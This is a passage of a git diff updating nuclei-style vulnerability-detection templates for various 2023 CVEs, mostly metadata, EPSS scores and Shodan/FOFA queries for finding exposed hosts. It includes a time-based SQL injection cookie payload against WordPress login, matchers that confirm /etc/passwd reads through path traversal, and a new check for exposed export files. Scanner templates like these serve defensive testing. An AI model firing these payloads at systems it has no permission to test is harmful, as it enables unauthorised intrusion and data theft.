epss-percentile: 0.27592 cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: structurizr product: on-premises_installation shodan-query: http.favicon.hash:1199592666 + fofa-query: icon_hash=1199592666 tags: cve,cve2023,xss,structurizr,oos,authenticated variables: str: "{{randstr}}" @@ -98,4 +99,4 @@ http: regex: - '\/workspace\/([0-9]+)\?scriptNonce=' internal: true -# digest: 490a0046304402206ef468fce96e52210ef42ebedc016c173ff1a4381437ae9e2a655261988f671d022077243b6d2ccb046199a4b226cd7d97dff9dd6a24578ac0cca33657a26c70ad63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a1252c91302fdb2e415894f2edb3ce9ddca2782343db2834dafd615c2f2ccd0022100ff34726baa2c011bbb80010f936f106079be1d9b91b57e064f5408d8ce7432b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml index 51fd449d81..4060f28cdc 100644 --- a/http/cves/2023/CVE-2023-5830.yaml +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -21,14 +21,18 @@ info: cve-id: CVE-2023-5830 cwe-id: CWE-287 epss-score: 0.00427 - epss-percentile: 0.73911 + epss-percentile: 0.74333 cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: documentlocator product: document_locator - shodan-query: 'title:"Document Locator - WebTools"' - tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools + shodan-query: + - 'title:"Document Locator - WebTools"' + - http.title:"document locator - webtools" + fofa-query: title="document locator - webtools" + google-query: intitle:"document locator - webtools" + tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator http: - raw: @@ -60,4 +64,4 @@ http: part: body words: - '"Authorized":false' -# digest: 4a0a00473045022100e96e3f0489d007a9f47fac7ecf08b3760876b4ebe8ef9c9dd87c547303c2c9e5022073cd8996d518b5055d0c7e2c678f6e6f859a6ea0738f651b4389e54edf538ec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220425c015f75f4be26cac35e09ccec4b8750de351cdf8d7650257509c98c93ac41022100d59c935fc0215a9b88b0d979237d9dc944338c9f9a295514f429a1fdb3ae3bb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5914.yaml b/http/cves/2023/CVE-2023-5914.yaml index 2dbeb41235..bc0b0d27c6 100644 --- a/http/cves/2023/CVE-2023-5914.yaml +++ b/http/cves/2023/CVE-2023-5914.yaml @@ -17,14 +17,17 @@ info: cve-id: CVE-2023-5914 cwe-id: CWE-79 epss-score: 0.00095 - epss-percentile: 0.3876 + epss-percentile: 0.39942 cpe: cpe:2.3:a:cloud:citrix_storefront:*:*:*:*:ltsr:*:*:* metadata: max-request: 1 vendor: cloud product: citrix_storefront - shodan-query: html:"/Citrix/StoreWeb" - tags: cve,cve2024,xss,citrix,storefront + shodan-query: + - html:"/Citrix/StoreWeb" + - http.html:"/citrix/storeweb" + fofa-query: body="/citrix/storeweb" + tags: cve,xss,citrix,storefront,cve2023,cloud http: - method: POST @@ -41,4 +44,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "XmlException")' condition: and -# digest: 4a0a00473045022100ddcc759c821d79ce4ed8806039b80715c20472a8dbffa3eab8eaa215ff25dfc3022017cdae9fbe0dcdb9504238d98a1adc34fa3b73af7cd7cfee711288bdfef500cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ccec8044121731cec8adc8d22c54e462ada30eef8c491cdecc278c315e01502c02207c5d9be110a2f11e8fffcd7f6d539a48b32431bc9f28f5e62628be555f8db784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index da1a165a5d..45d854077e 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-5991 cwe-id: CWE-22 - epss-score: 0.00603 - epss-percentile: 0.78412 + epss-score: 0.17487 + epss-percentile: 0.96115 cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,8 +24,10 @@ info: vendor: motopress product: hotel_booking_lite framework: wordpress + shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking + fofa-query: body=/wp-content/plugins/motopress-hotel-booking publicwww-query: "/wp-content/plugins/motopress-hotel-booking" - tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp + tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress http: - method: GET @@ -49,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220014d0afbf313c77eebbf17a87a636bfffda4e29359e40ad4ca50e421977f9c0f022049fddedfdc464a6562d4ed201b1cac4fb18011eeb933ff7d55619d9325b667ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008aed4131d72f2a882a3d06d2d9baa4b4e8c1587b36400dfe6e4177d7ab0dfd74022025db93ee8eb043c22cac910ae7ddafe92f578a3c00db013fe89aa59d4e0e35ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index 4d957bdc53..3dbba32730 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-6018 cwe-id: CWE-78 epss-score: 0.86232 - epss-percentile: 0.98502 + epss-percentile: 0.98574 cpe: cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:* metadata: verified: true @@ -23,7 +23,11 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - tags: cve,cve2023,mlflow,oss,rce,intrusive + fofa-query: + - title="mlflow" + - app="mlflow" + google-query: intitle:"mlflow" + tags: cve,cve2023,mlflow,oss,rce,intrusive,lfprojects variables: model_name: "{{rand_text_alpha(6)}}" @@ -67,4 +71,4 @@ http: - '"registered_model":' - '"name":' condition: and -# digest: 490a00463044022052f02e7aa3838fce1739f32e8a1da643d5788b48a35c72d756224d83d73c79000220410b9ebbb1498060027b19a08cd6f423607efad2d28b3c23a5d7b2acbf2e8bea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210099d1acabd37ecf0040ced0da3af09a84bf196bdafe114d2713bca0d04afb379702201a3d094b47d82e82dbe775c0a58c39a548a6f67d656ffa37c1c45a5d5d43591b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index d88f9a08ae..fbea8e8569 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -15,14 +15,19 @@ info: cve-id: CVE-2023-6020 cwe-id: CWE-862 epss-score: 0.06351 - epss-percentile: 0.9349 + epss-percentile: 0.93636 cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ray_project product: ray - shodan-query: http.favicon.hash:463802404 + shodan-query: + - http.favicon.hash:463802404 + - http.html:"ray dashboard" + fofa-query: + - body="ray dashboard" + - icon_hash=463802404 tags: cve2023,cve,lfi,ray,oos,ray_project http: @@ -47,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100deec5c973c35fa67721362401e0c2701d6dd8f7d163f5d156b154fe42f891b3f02206a9d4410ff07e2f051d593e77b96f6cdcc79cd0a4e279c64e15e1db1c14ffe5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220016faf5d218a154c3f85462ee9932819b2423bfcb41ffda404b70dee337dd6b7022100e89b86ddec2eb7b76100a9561996bcb97cb09eb953888a2dc7890bf1b81e5f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index 1ffb9b62e9..a3e9672f88 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -15,14 +15,20 @@ info: cve-id: CVE-2023-6021 cwe-id: CWE-22,CWE-29 epss-score: 0.0038 - epss-percentile: 0.72442 + epss-percentile: 0.72895 cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: ray_project product: ray - shodan-query: html:"Ray Dashboard" + shodan-query: + - html:"Ray Dashboard" + - http.favicon.hash:463802404 + - http.html:"ray dashboard" + fofa-query: + - body="ray dashboard" + - icon_hash=463802404 tags: cve,cve2023,lfi,ray,oos,ray_project http: @@ -56,4 +62,4 @@ http: name: nodeid json: - '..|objects|.nodeId//empty[0]' -# digest: 4a0a00473045022100d4fbb382aa5dd26c05c8591f16e5c16ad8d41d3f0fc6b9960483f53288f6a1c402200ba9fd061ec61c3494888eb5dff978330e66c815347dffeb9d82acea7081967f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1248f0ce74ec3ad6e929f214a946c92e4efaf53912ff535667598345e88495f02206ca3d10c0df29c683bb373a193d673c8c661b9096c6a83cfe8f81015012efe4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6023.yaml b/http/cves/2023/CVE-2023-6023.yaml index e9e4cb741d..179497aa32 100644 --- a/http/cves/2023/CVE-2023-6023.yaml +++ b/http/cves/2023/CVE-2023-6023.yaml @@ -18,16 +18,24 @@ info: cve-id: CVE-2023-6023 cwe-id: CWE-22,CWE-29 epss-score: 0.003 - epss-percentile: 0.68895 + epss-percentile: 0.69472 cpe: cpe:2.3:a:vertaai:modeldb:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vertaai product: modeldb - shodan-query: http.favicon.hash:-2097033750 - zoomeye-query: title:"Verta AI" - tags: cve,cve2023,lfi,modeldb + shodan-query: + - http.favicon.hash:-2097033750 + - http.title:"verta ai" + fofa-query: + - icon_hash=-2097033750 + - title="verta ai" + google-query: intitle:"verta ai" + zoomeye-query: + - title:"Verta AI" + - title:"verta ai" + tags: cve,cve2023,lfi,modeldb,vertaai http: - method: GET @@ -51,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220413ca98f296d85576af9dee2201bfc9588c0bfca659b1ed6604fd9b576a2be8202203a19defaa8d6fb92815290ba857c5e6489376eac541531ed518bab9f2ff122f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c69b25625a73d8650d632e7e123959c5bae22681146d202eccf0312e7c2cd810022100842c2167554daecf73927e131695af94eb60b7f1f1b504206e0730cdbf4c19d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml index 2b80f785df..20a19867ea 100644 --- a/http/cves/2023/CVE-2023-6038.yaml +++ b/http/cves/2023/CVE-2023-6038.yaml @@ -14,16 +14,20 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-6038 - cwe-id: CWE-862,CWE-29 - epss-score: 0.05392 - epss-percentile: 0.92391 + cwe-id: CWE-862 + epss-score: 0.06351 + epss-percentile: 0.93636 cpe: cpe:2.3:a:h2o:h2o:-:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: h2o product: h2o - shodan-query: title:"H2O Flow" + shodan-query: + - title:"H2O Flow" + - http.title:"h2o flow" + fofa-query: title="h2o flow" + google-query: intitle:"h2o flow" tags: cve,cve2023,h2o-3,h2o,ml http: @@ -47,4 +51,4 @@ http: - "regex('root:.*:0:0:', body_2)" - "status_code_2 == 200" condition: and -# digest: 4a0a00473045022100d23a99051d0ca3c7ed9f00df5f9dff40fc14d7bbfe4a1a21e9996fe7df89f8cb02203a1b3dbd2ab774f9296aada9f5de5d759852382066531edbe9b558c90f0e5322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bbca674fd6eedb1264de3b9612164d3bf6f1b70a3bb7d87303eb499e52fa1f3e02200be4bf6e50b284676c440a392ba0bc467b410019a2d066f93ad9cdce0c734694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 57281bd29f..59ec82f510 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -1,7 +1,7 @@ id: CVE-2023-6063 info: - name: WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection + name: WP Fastest Cache 1.2.2 - SQL Injection author: DhiyaneshDK severity: high description: | @@ -19,16 +19,22 @@ info: cve-id: CVE-2023-6063 cwe-id: CWE-89 epss-score: 0.02974 - epss-percentile: 0.9065 + epss-percentile: 0.90865 cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: wpfastestcache - product: wp_fastest_cache + product: "wp_fastest_cache" framework: wordpress - publicwww-query: /wp-content/plugins/wp-fastest-cache/ - tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin -flow: http(1) && http(2) + shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/" + fofa-query: "body=/wp-content/plugins/wp-fastest-cache/" + publicwww-query: "/wp-content/plugins/wp-fastest-cache/" + tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache +flow: | + if (http(1)) { + for (let i = 0; i < 2; i++) { + http(2); + }} http: - method: GET @@ -43,17 +49,18 @@ http: condition: and internal: true - - method: GET - path: - - "{{BaseURL}}/wp-login.php" - headers: - Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND "tqKU"="tqKU + - raw: + - | + @timeout: 20s + GET /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(6)))NkcI) AND "tqKU"="tqKU matchers: - type: dsl dsl: - - 'duration>=7' + - 'duration>=6' - 'status_code == 200' - - 'contains(body, "wp-admin")' + - 'contains(body, "/wp-")' condition: and -# digest: 4b0a00483046022100f7bbc27951654dbca3bdf6a948dc356043e28efc07a03645748cfa66dbbb3300022100fe0227a802728849ed9f0a716c13e735cf9a337470c06bfc6ce3fd9ed0f4da77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df685a1d55b11e797278a035af7b4589541daf50f23773916305e7782256b763022100a6e038409b46bc92465fb474c672a5df2ee6272d28ac94f68353d1bf0c7960b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index a5eee969f4..1ff6b13a5e 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-6065 - epss-score: 0.00046 - epss-percentile: 0.16199 + epss-score: 0.00146 + epss-percentile: 0.50461 cpe: cpe:2.3:a:quttera:quttera_web_malware_scanner:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: vendor: quttera product: quttera_web_malware_scanner framework: wordpress - tags: cve,cve2023,wp-plugin,quttera,wpscan, + tags: cve,cve2023,wp-plugin,quttera,wpscan,wordpress http: - method: GET @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d57bed9f86a5c3790fab7c7ad97d0ce2a40a3769cadf8c03db9fe296816f3dc022100a72b53af19a2d49d7d48f413a62219b54ef121d6c17aa1c35758f4608f69b95f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005001b01391a5cf9caf01e1e3db906c86acc1482e7c721014903bdcfb419bd3c022100a49e6cf5b3109c7194bc2ef657dd5c0db40e36630a685619738a2d06a62e792d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml index a6f9c783c2..c25deecc3b 100644 --- a/http/cves/2023/CVE-2023-6114.yaml +++ b/http/cves/2023/CVE-2023-6114.yaml @@ -17,15 +17,16 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6114 cwe-id: CWE-552 - epss-score: 0.00145 - epss-percentile: 0.50326 + epss-score: 0.01646 + epss-percentile: 0.87553 cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:* metadata: max-request: 2 - product: duplicator vendor: awesomemotive + product: duplicator framework: wordpress - tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp + google-query: inurl:"/wp-content/plugins/duplicator" + tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp,awesomemotive http: - method: GET @@ -40,4 +41,4 @@ http: - "status_code == 200" - "contains(body, '/tmp') && contains(body, 'Index of')" condition: and -# digest: 4b0a00483046022100eabf9219dc9e6989598a1e706ef63cba43186ef9f0414058760b4d431972d3b802210095d09270e8945a8668e0078e71b8b8acecd04475963e29c6561245d80492846f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dcc94d59aa7434d71f25eac9193fbfafab7a322c155123ae491ac4510c38ccea022054af43cbe55ecf715023e83dbf40e7e5070d4a06a20a50402a5c5d296ee96dfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index e25f728e00..49a9b9aa46 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-6360 cwe-id: CWE-89 epss-score: 0.00832 - epss-percentile: 0.81644 + epss-percentile: 0.81991 cpe: cpe:2.3:a:joedolson:my_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,7 +30,7 @@ info: product: my_calendar framework: wordpress fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"' - tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar + tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar,joedolson flow: http(1) && http(2) http: @@ -55,4 +55,4 @@ http: - 'contains(body, "[]")' - 'duration >= 6' condition: and -# digest: 4a0a0047304502203abe044d78eb44235d24bb992c374dfd703651411e9f993f6bd4b985c6f0348d022100be46793ecec88a8ebc27e0c913ce775aa35f2697071e4d5dede66a0a59ed24b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fd1abaa8be5bfa95d08a60c070bba83152dd6af7bb3f970cad559258a3845fe022100b62ff3a35f50dfcc31b2020bcf504f427420cd73bf22530a4ce7220886732cf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index d12adc333b..ec77eb4885 100644 --- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -19,15 +19,21 @@ info: cvss-score: 6.1 cve-id: CVE-2023-6379 cwe-id: CWE-79 - epss-score: 0.00113 - epss-percentile: 0.44636 + epss-score: 0.00075 + epss-percentile: 0.32047 cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 11 vendor: alkacon product: opencms - shodan-query: title:"opencms" + shodan-query: + - title:"opencms" + - http.title:"opencms" + - cpe:"cpe:2.3:a:alkacon:opencms" + - /opencms/ + fofa-query: title="opencms" + google-query: intitle:"opencms" tags: cve2023,cve,opencms,xss,alkacon http: @@ -66,4 +72,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b71db177da91e5e6c5e897488cbdc0d42d62cd5a08eb0cf9118b75c657302b5d02201e724c6dc9389e19b0e1e7f1c0ef4302a6331009f3fc4ed69d27c5d4c6fef93b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b23434311046f2118a934456d41f8450e59e2e9e10d33826f69c38176088f17c022100f3116a2cea078ef92a687c66f3793852f830e397529696f42679d997ebb2f150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index f2fcf4b42d..be21d7fc93 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -16,15 +16,20 @@ info: cve-id: CVE-2023-6380 cwe-id: CWE-601 epss-score: 0.01158 - epss-percentile: 0.83366 + epss-percentile: 0.84838 cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: alkacon product: opencms - shodan-query: "/opencms/" - tags: cve,cve2023,redirect,opencms + shodan-query: + - "/opencms/" + - http.title:"opencms" + - cpe:"cpe:2.3:a:alkacon:opencms" + fofa-query: title="opencms" + google-query: intitle:"opencms" + tags: cve,cve2023,redirect,opencms,alkacon http: - method: GET @@ -36,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100a5a608b89ffe743993de0f02706ecec163b8896eedd5eddc7760c0b04d5ab0ab02207aceb79637f8deb9884da67bcb4a0670206654de1aa6dac32dc892f0f28d2309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b943bbe6c73534d987ec49f62c76b633e33127ed6ab070aa135200711e589190220115baad7107124c54b437c7ff876f7bff53f62665352146dfdd9bfeb6bae15da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6389.yaml b/http/cves/2023/CVE-2023-6389.yaml index 74d9433cde..e5cd4a0c6d 100644 --- a/http/cves/2023/CVE-2023-6389.yaml +++ b/http/cves/2023/CVE-2023-6389.yaml @@ -22,8 +22,10 @@ info: max-request: 1 vendor: abhinavsingh product: wordpress_toolbar + shodan-query: http.html:/wp-content/plugins/wordpress-toolbar/ + fofa-query: body=/wp-content/plugins/wordpress-toolbar/ publicwww-query: "/wp-content/plugins/wordpress-toolbar/" - tags: cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect,abhinavsingh http: - method: GET @@ -35,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a00473045022100c227bbaa90d02a8b9a508a44f888cc765c6a1454560b1517de91547f856b16df022006e4ae4b398be8b002c3d5d69184bc04a8181d0019c21f8ed05cf288b73b603c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c02ded482859448a1bda812ee6638f116a12421d8fc431859d42761ca5c38dd3022015c86130724ca43cce6b7cd93aeea90fa3d03cc9a0cd16569cb4603bdfb530b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6505.yaml b/http/cves/2023/CVE-2023-6505.yaml new file mode 100644 index 0000000000..a1c805a7f7 --- /dev/null +++ b/http/cves/2023/CVE-2023-6505.yaml @@ -0,0 +1,47 @@ +id: CVE-2023-6505 + +info: + name: Prime Mover < 1.9.3 - Sensitive Data Exposure + author: securityforeveryone + severity: high + description: | + Prime Mover plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.2 via directory listing in the 'prime-mover-export-files/1/' folder. This makes it possible for unauthenticated attackers to extract sensitive data including site and configuration information, directories, files, and password hashes. + remediation: | + Fixed in 1.9.3 + reference: + - https://wpscan.com/vulnerability/eca6f099-6af0-4f42-aade-ab61dd792629 + - https://research.cleantalk.org/cve-2023-6505-prime-mover-poc-exploit/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-6505 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-6505 + epss-score: 0.00087 + epss-percentile: 0.36916 + cpe: cpe:2.3:a:codexonics:prime_mover:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: codexonics + product: prime_mover + framework: wordpress + fofa-query: body="/wp-content/plugins/prime-mover" + tags: cve,cve2023,wp,wp-plugin,wordpress,exposure,prime-mover,listing + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/prime-mover-export-files/1/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Index of /wp-content/uploads/prime-mover-export-files/1' + - '.wprime' + condition: or + + - type: status + status: + - 200 +# digest: 490a0046304402207b6087f316e997f175717b9bd29d8ef685a57d7930faa01acb39f718680cf90602206209359c32816243472ccbfddf7852055d08dcb3295b5262fcd4fdab01f59fe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6553.yaml b/http/cves/2023/CVE-2023-6553.yaml index 400597e957..bdfb532fc4 100644 --- a/http/cves/2023/CVE-2023-6553.yaml +++ b/http/cves/2023/CVE-2023-6553.yaml @@ -24,9 +24,11 @@ info: vendor: backupbliss product: backup_migration framework: wordpress + shodan-query: http.html:/wp-content/plugins/backup-backup/ + fofa-query: body=/wp-content/plugins/backup-backup/ publicwww-query: /wp-content/plugins/backup-backup/ google-query: inurl:"/wp-content/plugins/backup-backup/" - tags: cve,cve2023,wp-plugin,rce,unauth,wordpress,wp + tags: packetstorm,cve,cve2023,wp-plugin,rce,unauth,wordpress,wp,backupbliss flow: http(1) && http(2) http: @@ -55,4 +57,4 @@ http: - 'status_code == 200' - '!contains(body, "Incorrect parameters")' condition: and -# digest: 4b0a00483046022100ddebbe709631857b161d91f48fcaad3cbcbcf64ac268f381b2fb06b62d443ca6022100978d207450ff4e3b1354ed0c4bd55f7f0618aeeac8be603ccce61db984c0e2cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022046570b0b4e58d3527a4c3be37e4e041ff3d731e2af4b42eb4066bd36bad48675022031023b285a24e0cc53f113f29c661a3ae15229879be46347a6cf87b0ee2eecf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index a6e2943d61..b4b169302e 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -27,8 +27,10 @@ info: vendor: thimpress product: learnpress framework: wordpress + shodan-query: http.html:/wp-content/plugins/learnpress + fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli + tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress http: - method: GET @@ -42,4 +44,4 @@ http: - 'contains_all(header, "lp_session_guest=", "application/json")' - 'contains_all(body, "status\":\"success", "No courses were found")' condition: and -# digest: 4a0a0047304502210085b3b5a77e87f606925cb203290c351bfd67682723d02555577f4197749a33d002203afee6ee56b4b406278f2cecc726ba148b39886cff4d5476eb0cc3775c15b319:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b53e35f7ae7569acb1bda7d05de5b75012a7ea5d1eb74c3111f8dc5eeca6efb3022020b1e830c63e9643fa36e745f1a77cf067f43f4fda85cc07997cfe278d0d470e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index f6dabde295..6ddb116015 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -28,8 +28,10 @@ info: vendor: wpdeveloper product: essential_blocks framework: wordpress + shodan-query: http.html:/wp-content/plugins/essential-blocks/ + fofa-query: body=/wp-content/plugins/essential-blocks/ publicwww-query: "/wp-content/plugins/essential-blocks/" - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi + tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper http: - method: GET @@ -44,4 +46,4 @@ http: - "regex('root:.*:0:0:', body_1)" - 'contains(body_2, "Essential Blocks – Page")' condition: and -# digest: 4a0a0047304502207d8c7609094a1fcc45e09dc8ebe35c75ac8395a88ae445e167670d8170179e66022100d155f3979980076224bb71384247a853423ac98c0fe216581f8f55343ee217a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220025cd53c7a663651d839f0ad35424da7534ea7cb30906de15667d74376584959022100ed9e6c7a470d28ace1ff2616b51480283f4e46af81bb8fc5e46dbd7a2dc723de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6634.yaml b/http/cves/2023/CVE-2023-6634.yaml index 